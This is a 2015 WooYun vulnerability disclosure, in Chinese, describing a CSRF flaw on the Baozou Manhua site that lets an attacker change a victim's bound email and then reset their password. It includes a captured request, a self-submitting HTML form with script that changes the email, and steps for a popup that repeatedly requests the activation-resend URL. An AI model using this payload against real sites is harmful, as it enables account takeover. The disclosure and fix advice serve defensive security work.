当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095014

漏洞标题:暴走漫画#Csrf防御不当可利用此漏洞修改他人绑定邮箱从而重置密码

相关厂商:baozoumanhua.com

漏洞作者: 浅蓝

提交时间:2015-02-02 14:15

修复时间:2015-03-19 14:16

公开时间:2015-03-19 14:16

漏洞类型:CSRF

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-02: 细节已通知厂商并且等待厂商处理中
2015-02-03: 厂商已经确认,细节仅向厂商公开
2015-02-13: 细节向核心白帽子及相关领域专家公开
2015-02-23: 细节向普通白帽子公开
2015-03-05: 细节向实习白帽子公开
2015-03-19: 细节向公众公开

简要描述:

一起来守护暴漫的菊花

详细说明:

HJLT`$UKSYC[EWQXUMS99QQ.png


首先在验证邮箱的地方 修改一下邮箱并且抓包。 此时我的邮箱是乱填的
提交地址:http://baozoumanhua.com/users/8311358
提交数据:
-----------------------------195704664324
Content-Disposition: form-data; name="utf8"
✓
-----------------------------195704664324
Content-Disposition: form-data; name="_method"
put
-----------------------------195704664324
Content-Disposition: form-data; name="authenticity_token"
FI+dAl32T5Oh1W5G0LQ4ArOK1t9JQRqoNOLWHaTHEgk=
-----------------------------195704664324
Content-Disposition: form-data; name="user[email]"
aaaxasa1@qq.com
-----------------------------195704664324
Content-Disposition: form-data; name="commit"
修改邮箱
这是有token的
接着我写一个表单

<form id="csrf"  action="http://baozoumanhua.com/users/用户id" method="post">
<input type=hidden name="utf8" value="✓">
<input type=hidden name="_method" value="put">
<input type=hidden name="authenticity_token" value="FI+dAl32T5Oh1W5G0LQ4ArOK1t9JQRqoNOLWHaTHEgk=">
<input type=hidden name="user[email]" value="你的邮箱">
<input type=hidden name="commit" value="修改邮箱">
<script>
document.getElementById('csrf').submit();
</script>
</form>


再点击发送激活邮件 抓包
GET:http://baozoumanhua.com/my/resend/用户ID
此时我将表单的 email 换成我的有效邮箱
接着打开并且抓包

($BN`][G52Z%LZWJF]OY_TT.jpg

直接提示修改成功 无视token

6@6E`V]7~)[ZQKEXRBV%ORX.png


可以看到 先get访问了 a.htm 然后再post提交到 暴走漫画
现在邮箱改掉了 只需要 访问http://baozoumanhua.com/my/resend/8311358 就行
至于这个 做个弹窗到新窗口 弹到b.htm b.htm 用js写个每一秒GET访问一次
http://baozoumanhua.com/my/resend/8311358
这时我被弹到了b.htm, 被弹到b.htm后会很多次get访问http://baozoumanhua.com/my/resend/8311358
接着我就收到了激活邮件

]Q4VGP[H9@IBT2H_VD%R2`U.png


漏洞证明:

WK)IINN~UEZ0A@YS[CX~PBR.png


现在被激活了 就可以去http://baozoumanhua.com/fetchpass 发送一个重置密码邮件。
=。= 接着就可以改他的密码了

修复方案:

可以像上次那个漏洞一样 WooYun: 暴走漫画越权发暴漫作品(拿王尼玛帐号测试)利用打赏功能发财致富走上人生巅峰
把token带到 http头部 或者验证一下referer。

版权声明:转载请注明来源 浅蓝@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-02-03 20:51

厂商回复:

最新状态:

暂无